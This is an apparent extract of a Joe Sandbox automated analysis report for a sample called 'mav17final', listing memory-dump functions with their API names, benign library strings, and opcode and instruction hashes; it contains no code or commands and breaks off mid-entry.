                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AdaptersAddresses
                                                  • String ID: GetAdaptersAddresses() syscall failed.
                                                  • API String ID: 2506852604-4058666537
                                                  • Opcode ID: d101b9013dadac10b624a53d313ad985bcf945ba5d4eee5b36ee356b8a81db31
                                                  • Instruction ID: 760d82d0b1c50da5fa48e73ed4e156f2c00a7351b3669c7964387a0e88b6cd87
                                                  • Opcode Fuzzy Hash: d101b9013dadac10b624a53d313ad985bcf945ba5d4eee5b36ee356b8a81db31
                                                  • Instruction Fuzzy Hash: AA215425B18AC283DF14DF39E84556A67A1FB987A4F845035DB4E47B14DF3DD44ACB00
                                                  Function 00007FF8B907414C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 5d58f94e0c7063d1f9754a7f14833d87991715d269e1c21cdb0770847f64694a
                                                  • Instruction ID: 4fe07bad88f4071b9f6270463be81c7432823dee815572cc2cf867bbaa6b6ac3
                                                  • Opcode Fuzzy Hash: 5d58f94e0c7063d1f9754a7f14833d87991715d269e1c21cdb0770847f64694a
                                                  • Instruction Fuzzy Hash: 51111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  Function 00007FF8B9074155 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 254bed0aad9f9968bbd4bf8c78f8dc4074290d1573cad8042a9eac18a45ae8ad
                                                  • Instruction ID: ed08835a6623da63504a1ac54e78c387ff92481b821544a24581112311101c46
                                                  • Opcode Fuzzy Hash: 254bed0aad9f9968bbd4bf8c78f8dc4074290d1573cad8042a9eac18a45ae8ad
                                                  • Instruction Fuzzy Hash: 0A111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  Function 00007FF8B9074143 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 50ef92c344278f83e193f52241ba6d6c11d405ba151e8597f3e6822c0cdc6b78
                                                  • Instruction ID: 9db89939bb6d08a86076ed3e0bc6f49f50bde8abcfbdf67a78668c74140053b0
                                                  • Opcode Fuzzy Hash: 50ef92c344278f83e193f52241ba6d6c11d405ba151e8597f3e6822c0cdc6b78
                                                  • Instruction Fuzzy Hash: A8111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  Function 00007FF8B9074170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: ed50a41741cc32e10fbc317f7f70ba1ff0e5041f5155fb48ba9c62befd946438
                                                  • Instruction ID: d36aa5bbdaa8135be1d133227ed2789913ed9d3dc3c78a655f58445ce5818707
                                                  • Opcode Fuzzy Hash: ed50a41741cc32e10fbc317f7f70ba1ff0e5041f5155fb48ba9c62befd946438
                                                  • Instruction Fuzzy Hash: D3111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  Function 00007FF8B907415E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 1947aba3c38216af73f6a8bcf8645978b1f766e944b610f994e34f79479488d4
                                                  • Instruction ID: 3e72060dec92c779884e8876f0f527671632b75980110cbba5dfadbc4e60a8c3
                                                  • Opcode Fuzzy Hash: 1947aba3c38216af73f6a8bcf8645978b1f766e944b610f994e34f79479488d4
                                                  • Instruction Fuzzy Hash: 80111C25A0DAC681EE649F6AA8543797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  Function 00007FF8B9074167 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$QueryVirtual
                                                  • String ID: (KsOI)
                                                  • API String ID: 3966390079-341566991
                                                  • Opcode ID: 151b7a8d80dcba40fcfe21bf746d29330e345b7ce5aff5766b4f76d73daef759
                                                  • Instruction ID: 6b1d89cd648a1fb9f3bb32134750bf9f869a8967364521eb0900d07ef663930f
                                                  • Opcode Fuzzy Hash: 151b7a8d80dcba40fcfe21bf746d29330e345b7ce5aff5766b4f76d73daef759
                                                  • Instruction Fuzzy Hash: 4C111C25A0DAC681EE649F6AA8583797761BF64BE5F444031CF4E47754EE3CE0178700
                                                  Function 00007FF8B9075E4A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$cdrom
                                                  • API String ID: 2340568224-2526730455
                                                  • Opcode ID: 2168a3a5ba0ea2bd28bec2a3a1a75b4c7cd237cd1a2e042f965d30902fe270f6
                                                  • Instruction ID: a8d468d1508e7f05c99c81f3ef49126e346fead1212a3e1ff1cfe9ab46665c42
                                                  • Opcode Fuzzy Hash: 2168a3a5ba0ea2bd28bec2a3a1a75b4c7cd237cd1a2e042f965d30902fe270f6
                                                  • Instruction Fuzzy Hash: 8F115C62A09BC685EF20DF29A8083B96BA0FBA8BE4F444431CA4D46754DF3CE54AC700
                                                  Function 00007FF8B9075E53 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$removable
                                                  • API String ID: 2340568224-1181830169
                                                  • Opcode ID: f7fa56cbcf72cb8298466a65ab87173f38330a48a8cb8a30748b62cfdd258d39
                                                  • Instruction ID: 638ba2b02cec6cdf13cc4c9c09e59f4035212fbd7d7c1fbb087a1f6c3fcfedbe
                                                  • Opcode Fuzzy Hash: f7fa56cbcf72cb8298466a65ab87173f38330a48a8cb8a30748b62cfdd258d39
                                                  • Instruction Fuzzy Hash: 51115C62A09BC685EF20DF29A8083B96BA0FBA8BE4F444431DA4D46754DF3CE54AC700
                                                  Function 00007FF8B9075E41 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$fixed
                                                  • API String ID: 2340568224-582244994
                                                  • Opcode ID: 1273737ecddc35d547f9797eefb13837d84265b7fc99937e5eec810aece3f242
                                                  • Instruction ID: d526ed2ae739fb92972e6f220aab62371d2349d021bf1657cb6d584e884bff95
                                                  • Opcode Fuzzy Hash: 1273737ecddc35d547f9797eefb13837d84265b7fc99937e5eec810aece3f242
                                                  • Instruction Fuzzy Hash: 53115E62A09BC685EF20DF29A8083B96BA0FBA4BE4F448431CA4D46754DF3CE546C700
                                                  Function 00007FF8B9075E6E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$remote
                                                  • API String ID: 2340568224-2439754154
                                                  • Opcode ID: be548896485e9aada0a4cc7ef498c54301aa554ebc19f2899d8954fd66e1924e
                                                  • Instruction ID: c6441c565e5a838379629773fd1d87319f9ffe3a567537ee7a350bd6cfeca59b
                                                  • Opcode Fuzzy Hash: be548896485e9aada0a4cc7ef498c54301aa554ebc19f2899d8954fd66e1924e
                                                  • Instruction Fuzzy Hash: 2B115E62A09BC685EF20DF29A8083B96BA0FBA4BE4F444431CA4D46754DF3CE546C700
                                                  Function 00007FF8B9075E77 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$ramdisk
                                                  • API String ID: 2340568224-2047227641
                                                  • Opcode ID: fbdad31f6192c8c6eadf597930b33b17e424c5a2c29a370213151f7863a3fc43
                                                  • Instruction ID: fed5dfe1c63b957ba7889f0d53966cebad0b873c277f2b011b346c31f1d92c0f
                                                  • Opcode Fuzzy Hash: fbdad31f6192c8c6eadf597930b33b17e424c5a2c29a370213151f7863a3fc43
                                                  • Instruction Fuzzy Hash: 8E115C62A09BC685EF60DF29A8083B96BA0FBA8BE4F444435DA4D46754DF3CE54AC700
                                                  Function 00007FF8B9075E5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$unknown
                                                  • API String ID: 2340568224-3196183135
                                                  • Opcode ID: eae622f4802fce6b8495e673403dfaa2573f4e18905d76c885cc3e1075e3457b
                                                  • Instruction ID: 4703639fe6686c0b244d2c8197c976cb04339513ec216761bf94e4ebe88d2e26
                                                  • Opcode Fuzzy Hash: eae622f4802fce6b8495e673403dfaa2573f4e18905d76c885cc3e1075e3457b
                                                  • Instruction Fuzzy Hash: 10115E62A09BC685EF20DF29A8083B96BA0FBA4BE4F444431DA4D46754DF3CE546C700
                                                  Function 00007FF8B9075E65 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID: (ssssIi)$unmounted
                                                  • API String ID: 2340568224-3738632989
                                                  • Opcode ID: e703148b4104a18077736411c53b7d987764021e2b097b77980d6e84312882a6
                                                  • Instruction ID: 434db8fc7f8b9bf2fb272feb80a4cb64ce5533531baeefdf8974b54ab7287dbf
                                                  • Opcode Fuzzy Hash: e703148b4104a18077736411c53b7d987764021e2b097b77980d6e84312882a6
                                                  • Instruction Fuzzy Hash: 53115E62A09BC685EF20DF29A8083B96BA0FBA4BE4F444431CA4D46754DF3CE546C700
                                                  Function 00007FF8BA2462EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FileHeader$ExceptionRaise
                                                  • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                  • API String ID: 3685223789-3176238549
                                                  • Opcode ID: 7bbd72394c3e749fc10370465baa4d9a755cb91736d17097c685b3404c0deaff
                                                  • Instruction ID: 625ff82aa209dff45b47e21a6b54aeb4c576ae4b1c6422b15912aca15a360f27
                                                  • Opcode Fuzzy Hash: 7bbd72394c3e749fc10370465baa4d9a755cb91736d17097c685b3404c0deaff
                                                  • Instruction Fuzzy Hash: BD017161A29A8791EF40DB18E5511B86361FF40FD4F4050B2EF0E06669EF7CE548D700
                                                  Function 00007FF8B9F6EDAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_FormatLongLong_
                                                  • String ID: one character bytes, bytearray or integer expected
                                                  • API String ID: 832222675-2748977362
                                                  • Opcode ID: 4171aea13ba1fa0aee4d8e851ffe7b5e382af772fa60775af7b968a914772540
                                                  • Instruction ID: 2a6473635eaa7b13ea23c7597610a5f4ffbf5be7b98bfdc0f23a49b745770445
                                                  • Opcode Fuzzy Hash: 4171aea13ba1fa0aee4d8e851ffe7b5e382af772fa60775af7b968a914772540
                                                  • Instruction Fuzzy Hash: 4C113D23A08BC385EB558F2DE5941792BA1EF5AFE6F18A031CB8D47351CE2CE4A4C301
                                                  Function 00007FF8B9F62DC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_String
                                                  • String ID: abstract class
                                                  • API String ID: 1259552197-1623945838
                                                  • Opcode ID: 889cc83bd7e42d210c141f1a36b7b4f58b9fb1ebab554f935c723b1e3cc6fbc7
                                                  • Instruction ID: 73399754d464911d4d8e379681cc9ccf8d85222a8905bda3ff562c0dd564ca3a
                                                  • Opcode Fuzzy Hash: 889cc83bd7e42d210c141f1a36b7b4f58b9fb1ebab554f935c723b1e3cc6fbc7
                                                  • Instruction Fuzzy Hash: 51112522A09B8682EA559F19E4543B927A4EF9ABF6F186134CB4D47395DF3CD444C340
                                                  Function 00007FF8BA246690 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
                                                  • Instruction ID: 58c3695f7946c2b2eadff518806b82a6e71f9b345b6a23cfd1e3bb92f2e111a6
                                                  • Opcode Fuzzy Hash: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
                                                  • Instruction Fuzzy Hash: A2113A32A08B8282EB208F29E54026977A5FB88BC4F184271EF8D07B68DF3DD5558B40
                                                  Function 00007FF8B9F6A15C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PyErr_SetString.PYTHON311 ref: 00007FF8B9F6A185
                                                    • Part of subcall function 00007FF8B9F6AA7C: PyErr_SetString.PYTHON311(?,?,?,?,00007FF8B9F6947D,?), ref: 00007FF8B9F6AABD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String
                                                  • String ID: NULL pointer access$Pointer does not support item deletion
                                                  • API String ID: 1450464846-1262937747
                                                  • Opcode ID: cc63e7bd2d2a3bc22265ebdaaeb10ee6e24a6e51b4ebc2f3b89706aefd929760
                                                  • Instruction ID: 27555848f75128ddf47e4bd96589e05914428eb231fbd092c0121680eeeac60c
                                                  • Opcode Fuzzy Hash: cc63e7bd2d2a3bc22265ebdaaeb10ee6e24a6e51b4ebc2f3b89706aefd929760
                                                  • Instruction Fuzzy Hash: 18016961A08B8681EA44CF5AE8404B97764BF8ABE5B149136DF4D477A5CF3CD540C700
                                                  Function 00007FF8B9F6E98C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF8B9F6EA24: PyType_IsSubtype.PYTHON311(?,?,?,?,00007FF8B9F6E889), ref: 00007FF8B9F6EA31
